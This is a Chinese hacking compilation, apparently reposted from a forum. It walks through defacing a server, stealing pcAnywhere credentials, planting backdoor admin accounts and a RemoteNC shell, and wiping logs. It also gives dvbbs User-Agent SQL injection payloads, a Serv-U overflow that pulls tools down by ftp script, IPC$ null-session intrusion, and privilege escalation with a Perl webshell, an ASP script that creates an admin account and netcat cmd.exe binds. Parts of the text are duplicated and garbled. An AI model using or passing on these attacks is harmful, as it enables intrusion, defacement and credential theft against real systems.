01-12-20 04:12p <DIR> temp
01-09-27 11:14a <DIR> unzipped
01-12-15 12:09a <DIR> WINNT
13 个文件 134,233,308 字节
54,232,576 字节可用
54,232,576 字节可用
这时我们便可以改对方的主页了!前提是先找到对方的web目录!来找找看
…………
XX分钟后,满头大汉,乖乖!竟然有X个盘,每个盘下又有XX个目录,这样找下去得何年何月?不成!要是有windows界面的形式就好找的多了!想想看,目标主机还开着5631端口,这正是pcanywhere远程管理端口呀!取了它的管理帐号和密码不就得了吗?不错的想法,呵呵……
默认情况下,pcanywhere安装于c:/Program Files目录下,其data目录下的.cif文件中保存着加密过的连接帐号和密码。只要得到此文件,就可以用一个叫pcanywherepwd的软件快速解出密码!
且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务:
选择“工具”菜单中的tftp服务器。设置一个默认根目录,点启动即可!
然后再用ms-sql客户端在目标服务器执行如下指令:
copy c:/progra~1/pcanywhere/data/New Caller.CIF c:/winnt/system32
tftp -i 本地ip put New Caller.CIF
命令执行成功,这个cif文件已被传到本地tftp目录下了!
此时,用pcanywherepwd.exe激活成功教程此文件,得到用户名为:administrator
密码为:amsrepair
打开pcanywhere manager建立一个指向211.154.xxx.xx的通道。在setting项中选择network host pc to control or ip adress, 并添上目标ip:211.154.xxx.xx
选中login information项中的automatically login to host up connection
并在下面的login name和password栏中添入刚才得到的用户名和密码!确定即可。双击新建立的通道,稍等片刻即可看到了对方桌面。这下好搞了,呵呵~~在
g:/home/wwweb/目录下,终于找到了他们的index.htm。删!再手动定一个简单的文件:
<html>
<head>
<title>hacked<title>
</head>
<body>
<center>
hacked
</center>
</body>
保存为:index.htm
修改主页完成。
该留个后门了,这是个NT主机,用小榕的RemoteNC做后门最好不过了!
先给系统加个超级用户,用ms-sql来做:
net user wing wing /add
net localgroup administrators wing /add
从对方桌面上打开ie连到小榕的站上下载RemoteNC,然后进入命令提示行状态,键入:
RemoteNC 211.154.xxx.xx wing wing LocalSystem “RemoteNC” “Provide Local CMD Redirect” 7 123456
系统显示:
[Install Service as RunasUser Mode]
Connecting 211.154.xxx.xx ….. Done.
Transffer File ….. Done.
Start Service ….. Done.
Now You can 211.154.xxx.xx to Connect, Have a Joy 安装成功
这样在任何时候都可以telnet 211.154.xxx.xx 7输入密码:123456即可使用系统任何资源了!
接下来该清理战场了,在ms-sql下停掉对方的ftp和www服务:
net stop msftpsvc
net stop w3svc
删除c:/winnt/sys tem32/logfile下的所有文件。
再将服务恢复:
net start msftpsvc
net start w3svc
将dvbbs送进地狱
前一段时间动网论坛的头像上传的漏洞给各大使用dvbbs论坛的网站带来难以愈合的创伤,这个漏洞甚至危及到了sp2的版本。为了解决这个问题,沙滩小子可能也耗尽了心血吧。但是动网论坛至此就真的安全了吗?回答是否定的,这不是在htt_user_agent变量上面有出现了漏洞吗,欲知详情,请听我慢慢道来。
漏洞文件:inc/dv_clsmain.asp
测试环境: dvbbs7.0.0+mssql
dvbbs7.0.0+sp1+mssql
dvbbs7.0.0+sp2+mssql
服务器os:windows 2000 advanced server
发现漏洞
n.e.v.e.r曾经发布了dvbbs6.x中关于http_user_agent变量过滤不严所造成的注入漏洞,我开始的时候以为这次在dvbbs7.0应该过滤了吧。但是在看过代码以后证明我的想法是错误的,只要经过巧妙的构造就可以实现对使用mssql数据库的论坛实现注入。还是让我们先来看一下出现漏洞的代码吧。
dvbbs7.0.0&dvbbs7.0.0+sp1中的inc/dv_clsmain.asp文件第1745-1755行为:
agent=request.servervariables(“http_user_agent”)
agent=split(agent,”;”)
if instr(agent(1),”msie”)>0 then
browser=”microsoft internet explorer ”
version=trim(left(replace(agent(1),”msie”,””),6))
elseif instr(agent(4),”netscape”)>0 then
browser=”netscape ”
dim tmpstr
tmpstr=split(agent(4),”/”)
version=tmpstr(ubound(tmpstr))
end if
dvbbs7.0.0+sp2中的inc/dv_clsmain.asp文件第1919-1938行为:
agent=request.servervariables(“http_user_agent”)
‘agent=”opera/7.23 (x11; linux i686; u) [en]”
if left(agent,7) =”mozilla” then ‘有此标识为浏览器
agent=split(agent,”;”)
if instr(agent(1),”msie”)>0 then
browser=”microsoft internet explorer ”
version=trim(left(replace(agent(1),”msie”,””),6))
elseif instr(agent(4),”netscape”)>0 then
browser=”netscape ”
tmpstr=split(agent(4),”/”)
version=tmpstr(ubound(tmpstr))
elseif instr(agent(4),”rv:”)>0 then
browser=”mozilla ”
tmpstr=split(agent(4),”:”)
version=tmpstr(ubound(tmpstr))
if instr(version,”)”) > 0 then
tmpstr=split(version,”)”)
version=tmpstr(0)
end if
end if
这两段代码是在class cls_browser的一部分用来判断用户的浏览器类型及版本的。然而在这两段代码中都存在相同的问题,即当agent(4)的值中包含netscape时便不会经过任何过滤,直接将字符串的值返回给version变量,但是这能有什么作用呢?接着再往下看。
在这个文件中的useractiveonline函数中(三个版本的内容相同)的部分代码为:
dim statuserid
statuserid = session(cachename & “userid”)(0)
sql = “select id,boardid from [dv_online] where id = ” & ccur(statuserid)
set rs = execute(sql)
if rs.eof and rs.bof then
if cint(forum_setting(36)) = 0 then
actcome = “”
else
actcome = address(uip)
end if
set browsertype=new cls_browser
sql = “insert into [dv_online](id,username,userclass,ip,startime,lastimebk,boardid,browser,stats,usergroupid,actcome,userhidden) values (” & statuserid & “,’客人’,’客人’,'” & usertrueip & “‘,” & sqlnowstring & “,” & sqlnowstring & “,” & boardid & “,'” & browsertype.platform&”|”&browsertype.browser&browsertype.version & “‘,'” & replace(left(stats,250),”‘”,””) & “‘,7,'” & actcome & “‘,” & userhidden & “)”
‘更新缓存总在线数据
myboardonline.forum_online=myboardonline.forum_online+1
name=”forum_online”
value=myboardonline.forum_online
set browsertype=nothing
else
sql = “update [dv_online] set lastimebk = ” & sqlnowstring & “,boardid = ” & boardid & “,stats = ‘” & replace(stats,”‘”,””) & “‘ where id = ” & ccur(statuserid)
end if
rs.close
set rs = nothing
execute(sql)
很显然从browsertype取得version的值以后也没有经过过滤就直接插入了sql变量的语句中调用execute函数执行数据库查询。在execute函数中有关语句过滤的代码为:
if instr(lcase(command),”dv_admin”)>0 and left(scriptname,6)<> “admin_” then
response.write savesqllog(command,””)’翻译成英文
command=replace(lcase(command),”dv_admin”,”dv<i>”&chr(95)&”</i>admin”)
end if
看出来了吧,只要我们的语句中没有dv_admin关键字就可以顺利通过了。
虽然已经把思路打通了,但是由于动网论坛中的防刷新机制的存在给我们的漏洞利用带来的很大的困难。但还是有办法解决的,还是一步一步来看我是怎么测试利用这个漏洞的吧。
小试牛刀
以sp1中的dv_clsmain.asp文件为例,在activeonline函数中第687行的
if datediff(“s”,reflashpagelasttime,now()) < 120 and lastvisiboardid = boardid then exit sub
是防刷新机制的关键语句,在初步测试的时候为了避免受到它的影响就先把它给注释掉。然后用wse对访问index.asp时的mime数据抓包,得到的数据为:
get /index.asp http/1.1
accept: */*
accept-language: zh-cn
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; .net clr 1.1.4322)
host: www.somesite.com
connection: keep-alive
cookie: dnetpubtemp=statuserid=2110913640; aspsessionidcqcbbscq=dmlbhjaajfofclflencdepgg
其中的user-agent的值便对应着代码中的request.servervariables(“http_user_agent”)的值,因此只要将user-agent构造为sql语句的话便可以实现对数据库的任意修改。
由于execute函数中过滤了dv_admin关键字,所以我们只好先修改前台管理员的密码了。将user-agent的值修改为:
mozilla/4.0 (compatible;m;m;m;’,’hacker’,7,”,2) update dv_user set userpassword=’123′ where usergroupid=1—netscape
然后用nc发送,nc运行结束以后再去看数据库的时候发现所有的前台管理员密码已经被修改成123,与此同时在dv_online表中也记录一条id=2110913640的数据,正如我们所想的,它的browser=’unknown|netscape’, stats=’hacker’。由此可见,通过构造user-agent的值进行注入是完全可以实现的。
防刷新问题的解决
刚才为了测试方便把防刷新的关键语句给注释了,那现在就把它给改回来。这样的话我们就面临着非常棘手的问题,由于我们的访问程序会在dv_online表中记录相应的访问数据,而只要这条数据存在的话就不会执行我们要跳转到可以注入的语句。因此只好等20分钟之后由于其他的用户访问而调用myboardonline.onlinequery过程将超时用户访问记录(包括我们刚才的访问记录)删除之后才可以再次进行欺骗注入。否则的话只会让我们的访问最后时间更新为当前值,而对其它数据没有任何影响。
每两次欺骗注入之间的时间间隔要20分钟!那么如果要向数据库写入木马的话还不要等到头发也白了。您也许会说,我是拨号上网的,只要重新拨号不就行了吗?当然可以了,不过即使这样对于我们来说是一件很痛苦的事。为了解决这个棘手的问题我们可以在修改数据库的同时将dv_online表中的所有记录全部删除,这样不就可以进行连续注入了吗。调整以后的user-agent的值为:
mozilla/4.0 (compatible;m;m;m;’,’hacker’,7,”,2) update dv_user set userpassword=’123′ where usergroupid=1 delete from dv_online—netscape
不信你测试一下,不管你在注入前数据库内有多少的用户访问记录,只要能够成功的欺骗成功不仅会将所有的前台管理员密码进行修改,而且还会将所有的用户访问记录删除得干干净净。
哈哈,现在我们不就可以随心所欲了吗,只要你能想到的,只要数据库用户有足够的权限。等一等,如果用户没有足够的权限怎么办,就是修改了前台管理员的密码又能怎么样。难道对后台管理员就真的束手无策了吗?不要急,请接着看。
突破execute过滤,向后台进军
由于在execute函数中过滤了dv_admin关键字,因此在使用sql查询语句的时候要避免它的出现。但是我们也不能就此放弃对dv_admin表的注入,否则的话不就前功尽弃了嘛。后来在《sql injection white paper》的启发下,我使用exec函数成功地解决了这个问题。如果将user-agent的值修改为:
mozilla/4.0 (compatible;m;m;m;’,’hacker’,7,”,2) declare @a nvarchar(255) select @a=’update dv_’+’admin set username=”firstsee”,password=”123”’ exec(@a)—netscape
就可以成功的把dv_admin中的所有记录的username的值修改为firstsee,而password的值修改为123。在这个构造值中把dv_admin关键字进行了拆分,然后通过字符串的连接功能又组合成了一个完整的查询语句,只要在exec函数中执行连接后的字符串就可以实现与直接查询相同的效果。
由于在mssql数据库中的exec函数的使用也受到一定的限制,因此也只有具备了这一权限的情况下才可以使用欺骗注入的方法进行后台管理员账号和密码的修改。
总结
您也许已经想到了,如果把前台管理员密码修改的语句与后台的修改语句放在一起,只需要进行一次注入就可以了,这样不就不用再去管什么防刷新了吗?但是经过我的测试后发现,如果user-agent的值的长度过大就会失败。而且exec函数的使用也受到一定的限制,因此为了保证最大的成功率,将两句分开还是最佳的选择,即使后台管理员账号修改失败,前台管理员密码的修改也不会受到任何影响。
现在的动网论坛通过修改后台管理摄制的办法已经不能够再上传木马了,因此即使成功的得到了管理权限对服务企也只是望而兴叹,但如果能够结合我在黑防第6起上面发表的《把dvbbs拉下马》文章中的accesstopic.asp漏洞在具备了足够的权限下还是可以上传木马的。
由于这个漏洞涉及到的脚本内容比较多,利用起来也很费劲,所以我写了一个exploit,具体的使用方法见详细说明。
这篇文章由于时间仓促,难免出现纰漏。还望大家能够不吝指出。
远程溢出serv-u
通过serv-u漏洞入侵全过程
serv-u漏洞已经发布了好长一段时间了,不过好多菜鸟朋友还没有能够掌握,
而且现在通过这个漏洞还能找很多肉鸡的,现在我就通过演示给广大的菜鸟
朋友看一下怎么来得到权限、放置后门、打补丁的!
serv-u服务器的配置都不错的哦!
所需要的工具:ftpscan.exe,hotmail的ftp密码帐号扫描工具,
killftp.exe,ftp漏洞溢出程序
wineggdrop, 后门工具
3389.exe,开3389的工具
还有补丁程序,jay的,大家可以看帖子:
http://jdwl.net.cn/qfaq/forum_view.asp?forum_id=5&view_id=2875
其他程序大家可以去清风上去下载!
需要的操作系统:98、2000、xp、2003下都可以成功溢出,还有大家最好找一个
ftp空间,你可以用自己的肉鸡做,也可以去找一些免费的空间,这个不在本教程
的讨论范围之内!
现在我们先来扫一些ftp帐号,可写不可写的都可以,我们看看ftpscan的使用方法
FTPSCAN.EXE StartIP EndIP Port Threads [FileName]
ftpscan 开始ip 结束ip ftp端口(一般用21) 线程(看你的机器配置而定) 保存的
文件名
好了,我们先让他扫着,下面我们来配置我们的后门程序,我这里用wineggdrop
做演示,详细的配置操作请看作者的说明文件!
后门程序有加壳和未加壳版本,未加壳的版本大家可以自己加下壳,我这里为了
演示的方便就用加过壳的,未加壳的版本要先加壳后配置!
好了我们配置好了,下面我们来制作成自解压文件,为了方便我们的使用!
下面我们把我们所需要的工具上传到我们的ftp空间上!
好了,现在我们登陆肉鸡来看看扫描结果,OK,找到了几个,我们来溢出看看
在溢出之前我们先来看看killftp的使用方法!
Usage: killftp
killftp
killftp
第一个是直接溢出,也是我们经常要使用的方法,第二个是要下载文件后门程序
并执行,第三个是用反弹端口的方法,你要先用nc监听一个端口,这个在有防火墙
的时候特别有用!
我们来看看!
好了成功的溢出一台了,我们加帐号先,
0K,我们来上传我们的工具!
echo open 61.187.190.170 >ftp.txt
echo ceshi >>ftp.txt
echo tongtu >>ftp.txt
echo binary >>ftp.txt [可选]
echo get 3389.exe >>ftp.txt
echo get 2.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
del ftp.txt
这样我们就成功的上传了我们的工具,一个是我们的后门程序,一个是开3389的
那位说了wineggdrop也能开终端,为什么还要用3389.exe开呢?呵呵,这个是
个人习惯而已!
OK,看看我的操作!
好了,我们已经成功的给他开了终端和放置了后门,现在我们要上去给他打上补丁
顺便给他克隆一个帐号!
等待服务器的重起中!。。。。。。。。。。。。。。。。。。。。。。。。。
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
服务器重起还是比较慢的!耐心的等待!
用wineggdrop开终端是不需要重起的哦!我们已经进来了!
这个就是我们的补丁程序,我们先用ftp上传上去
怎么样,现在这个肉鸡基本上就是你的了,是不是有些成功的喜悦呢?呵呵!
附件:serv-u.rar
SERV-U配置文件详解
SERV-U的目录文件结构说明
Servudaemon.exe serv-u的服务程序,主文件
Servudaemon.ini serv-u的配置文件,记录用户信息,服务器参数
Seruadmin.exe serv-u管理界面
Servuadmin.ini serv-u管理界面配置文件
Servutray.exe serv-u系统托盘程序
SERV-U配置文件例子
[GLOBAL]
Version=5.0.0.0
RegistrationKey=HsVRCjxHMe/HwDOrrUxqeMuChKO0DdlzUy2tCGgcdMVQDs/7P9EdwjKrowsPF//h4YObIvknAH/FHA95cfEyb3wzQp2v7UfOzCFEFq722
ProcessID=1172
[DOMAINS]
Domain1=0.0.0.0||21|Wizard Generated Domain|1|0|0
[Domain1]
User1=admin|1|0
[USER=admin|1]
Password=hr1589A4F0334FDF55D52F26DFA2D3CCEB
HomeDir=g:/
RelPaths=1
DiskQuota=1|153600000|0
SpeedLimitUp=5120
SpeedLimitDown=5120
TimeOut=600
Maintenance=System
Note1=”Administrator User”
Access1=g:/|RWAMELCDP
SERV-U配置文件分析
配置文件对大小写不敏感
行与行之间允许空行
主要分为2段
[GLOBAL]
全局变量段
主要设置SERV-U的注册号,以及刷新标志
[DOMAINS]
域名配置段
包括在serv-u下添加的所有域信息以及域以下用户列表
#具体分析
[GLOBAL]
Version=5.0.0.0
#无需改动.版本号
RegistrationKey=HsVRCjxHMe/HwDOrrUxqeMuChKO0DdlzUy2tCGgcdMVQDs/7P9EdwjKrowsPF//h4YObIvknAH/FHA95cfEyb3wzQp2v7UfOzCFEFq722
#无需改动.产品注册码
ProcessID=1172
#无需改动.注册号
ReloadSettings=True
#在修改INI文件后需加入此项,这时SERV-U会自动刷新配置文件并生效,此项随之消失.再有修改再次添加
[DOMAINS]
Domain1=0.0.0.0||21|Wizard Generated Domain|1|0|0
#无需改动.新增加的域的IP地址以及说明.
# 格式
# Domain1= IP地址 | 端口 | 域显示名称 | 是否生效 | 是否显示 | 是否删除
#IP地址为0.0.0.0时,SERV-U自动适配系统所分配的IP地址
#当生效位置0,则此域禁用
#当显示位置0,此域不生效并且在控制面板不显示此项
#当删除位置0,则ReloadSettings设置为Ture后,即刷新后,自动删除此域名以下所有内容
[Domain1]
#无需改动.与上面添加的域对应.是此域内的一些公共设置
User1=admin|1|0
#必填.用户列表
# 格式
# User序号 = 用户名 | 是否生效 | 是否删除
#User添加时必须按照序号排列,如果跳号,则跳号的不生效.如果序号重复.则排列在后的无效.
#是否生效置0,则此用户禁用
#是否删除置1,则刷新后删除用户信息,包括配置. 如果置2,则域下所有用户均删除.
[USER=admin|1]
#用户配置段,这些段的排列不分先后
# 格式 [ USER=用户名 | 是否?120
TimeOut=600
Maintenance=System
Note1=”Administrator User”
Access1=g:/|RWAMELCDP
SERV-U配置文件分析
配置文件对大小写不敏感
行与行之间允许空行
主要分为2段
[GLOBAL]
全局变量段
主要设置SERV-U的注册号,以及刷新标志
[DOMAINS]
域名配置段
包括在serv-u下添加的所有域信息以及域以下用户列表
#具体分析
[GLOBAL]
Version=5.0.0.0
#无需改动.版本号
RegistrationKey=HsVRCjxHMe/HwDOrrUxqeMuChKO0DdlzUy2tCGgcdMVQDs/7P9EdwjKrowsPF//h4YObIvknAH/FHA95cfEyb3wzQp2v7UfOzCFEFq722
#无需改动.产品注册码
ProcessID=1172
#无需改动.注册号
ReloadSettings=True
#在修改INI文件后需加入此项,这时SERV-U会自动刷新配置文件并生效,此项随之消失.再有修改再次添加
[DOMAINS]
Domain1=0.0.0.0||21|Wizard Generated Domain|1|0|0
#无需改动.新增加的域的IP地址以及说明.
# 格式
# Domain1= IP地址 | 端口 | 域显示名称 | 是否生效 | 是否显示 | 是否删除
#IP地址为0.0.0.0时,SERV-U自动适配系统所分配的IP地址
#当生效位置0,则此域禁用
#当显示位置0,此域不生效并且在控制面板不显示此项
#当删除位置0,则ReloadSettings设置为Ture后,即刷新后,自动删除此域名以下所有内容
[Domain1]
#无需改动.与上面添加的域对应.是此域内的一些公共设置
User1=admin|1|0
#必填.用户列表
# 格式
# User序号 = 用户名 | 是否生效 | 是否删除
#User添加时必须按照序号排列,如果跳号,则跳号的不生效.如果序号重复.则排列在后的无效.
#是否生效置0,则此用户禁用
#是否删除置1,则刷新后删除用户信息,包括配置. 如果置2,则域下所有用户均删除.
[USER=admin|1]
#用户配置段,这些段的排列不分先后
# 格式 [ USER=用户名 | 是否显示 ]
Password=hr1589A4F0334FDF55D52F26DFA2D3CCEB
#必填.密码.算法为随机产生2个字符,如hr.将hr+明文密码(如test)使用MD5加密,如MD5(“hrtest”),生成密码后将所有小写字符变为大写
#在最前加上这两个随机字符”hr”+”1589A4F0334FDF55D52F26DFA2D3CCEB”,生成最终密码
HomeDir=g:/
#必填.Home目录,用户登陆后的所在目录
RelPaths=1
#无需改动.锁定用户于Home目录,
DiskQuota=1|153600000|0
#必填.磁盘限额
# 格式 DiskQuota = 生效位 | 限制容量 | 实际使用量
#容量均以字节计算
SpeedLimitUp=5120
#可选.上传最大速度.以字节计算
SpeedLimitDown=5120
#可选.下载最大速度.以字节计算
TimeOut=600
#无需改动.超时,以秒计算,默认10分钟
Maintenance=System
#可选.用户权限,默认无此项
Note1=”Administrator User”
#可选.注释.默认无此项
Access1=g:/|RWAMELCDP
#必填.对于目录的存储权限,默认权限为RWAMLCDP.权限排列无需按照顺序.
# 格式 Access序号 = 目录 | 权限
#R 读取
#W 写入
#A 附加
#M 修改
#E 执行–由于安全原因,所有帐号均不能开启此权限
#L 目录列表
#C 建立目录
#D 删除目录
#P 将权限继承给子目录
标准的serv-u用户配置段例
[Domain1]
User1=admin|1|0
User2=test|1|0
[USER=admin|1]
Password=hr1589A4F0334FDF55D52F26DFA2D3CCEB
HomeDir=g:/
RelPaths=1
DiskQuota=1|153600000|0
TimeOut=600
Access1=g:/|RWAMLCDP
[USER=test|1]
Password=hr1589A4F0334FDF55D52F26DFA2D3CCEB
HomeDir=f:/test
RelPaths=1
DiskQuota=1|153600000|0
TimeOut=600
Access1=f:/test|RWAMLCDP
各种端口的入侵
. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
=============================
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(小榕的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
======================================
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到
密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:/>net use //127.0.0.1/IPC$ “” /user:”admintitrators”
这是用《流光》扫到的用户名是administrators,密码为”空”的IP地址(空口令?哇,运
气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连
接,因为密码为”空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名
,输入administrators,命令即可成功完成。
2. C:/>copy srv.exe //127.0.0.1/admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的
c:/winnt/system32/,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什
么地方去了)。
3. C:/>net time //127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:/>at //127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵
!)
5. C:/>net time //127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备
开始下面的命令。
6. C:/>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打
算建立一个Telnet服务!这就要用到ntlm了
7.C:/>copy ntlm.exe //127.0.0.1/admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:/WINNT/system32>ntlm
输入ntlm启动(这里的C:/WINNT/system32>指的是对方计算机,运行ntlm其实是让这
个程序在对方计算机上运行)。当出现”DONE”的时候,就说明已经启动正常。然后使
用”net start telnet”来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作
一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:/>net user guest /active:yes
将对方的Guest用户激活
11. C:/>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:/>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我
们可以用guest再次访问这台计算机)
提升权限终极技巧
个人总结如下:
1: C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
ps: 激活成功教程工具本站已提供。请自己Search一下!
2.C:/WINNT/system32/config/
进这里下它的SAM,激活成功教程用户的密码
用到激活成功教程sam密码的软件有LC,SAMinside
3.C:/Documents and Settings/All Users/「开始」菜单/程序/
看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:/
TimeOut=600
Maintenance=System
Access1=C:/|RWAMELCDP
Access1=d:/|RWAMELCDP
Access1=f:/|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:/winnt/system32/inetsrv/data/
就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
5.看能否跳转到如下目录
c:/php, 用phpspy
c:/prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, “Content-type: text/html/r/n/r/n”, 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2fig;
$execthis = $_;
syswrite(STDOUT, “<HTML><PRE>/r/n”, 13);
open(STDERR, “>&STDOUT”) || die “Can’t redirect STDERR”;
system($execthis);
syswrite(STDOUT, “/r/n</PRE></HTML>/r/n”, 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交
http://anyhost//cmd.pl?dir
显示”拒绝访问”,表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
http://anyhost//cmd.pl?c
/perl/bin/su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe “command”
Example: serv-u.exe “nc.exe -l -p 99 -e cmd.exe”
现在是 IUSR 权限,提交:
http://anyhost//cmd.pl?c
/perl/bin/su.exe “cacls.exe c: /E /T /G everyone:F”
http://anyhost//cmd.pl?c
/perl/bin/su.exe “cacls.exe d: /E /T /G everyone:F”
http://anyhost//cmd.pl?c
/perl/bin/su.exe “cacls.exe e: /E /T /G everyone:F”
http://anyhost//cmd.pl?c
/perl/bin/su.exe “cacls.exe f: /E /T /G everyone:F”
如果返回下面的信息,就表示成功了
Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready…
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain…
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting…
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员:
http://anyhost//cmd.pl?c
/perl/bin/su.exe ” net localgroup administrators IUSR_anyhost /add”
6.可以成功运行”cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps”来提升权限
用这个cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:/winnt/system32/inetsrv/asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps “C:/WINNT/system32/idq.dll” “C:/WINNT/system32/inetsrv/httpext.dll” “C:/WINNT/system32/inetsrv/httpodbc.dll” “C:/WINNT/system32/inetsrv/ssinc.dll” “C:/WINNT/system32/msw3prt.dll””c:/winnt/system32/inetsrv/asp.dll”
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
7.还可以用这段代码试提升,好象效果不明显
<%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject(“WSCRIPT.NETWORK”)
oz=”WinNT://”&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&”/Administrators,group”)
Set od=ob.create(“user”,”WekweN$”)
od.SetPassword “WekweN” <—–密码
od.SetInfo
Set of=GetObject(oz&”/WekweN$,user”)
oe.Add(of.ADsPath)
Response.write “WekweN$ 超级帐号建立成功!”%>
用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next ‘查找Administrators组帐号
Set tN=server.createObject(“Wscript.Network”)
Set objGroup=GetObject(“WinNT://”&tN.ComputerName&”/Administrators,group”)
For Each admin in objGroup.Members
Response.write admin.Name&”<br>”
Next
if err then
Response.write “不行啊:Wscript.Network”
end if
%>
8.C:/Program Files/Java Web Start/
这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。
9.最后了,如果主机设置很变态,可以试下在c:/Documents and Settings/All Users/「开始」菜单/程序/启动”写入bat,vbs等木马。
等到主机重启或者你ddos逼它重启,来达到权限提升的目的。
总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字”找” “上””执”
以上是本人的拙见,大家有什么好的方法多多分享
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/37784.html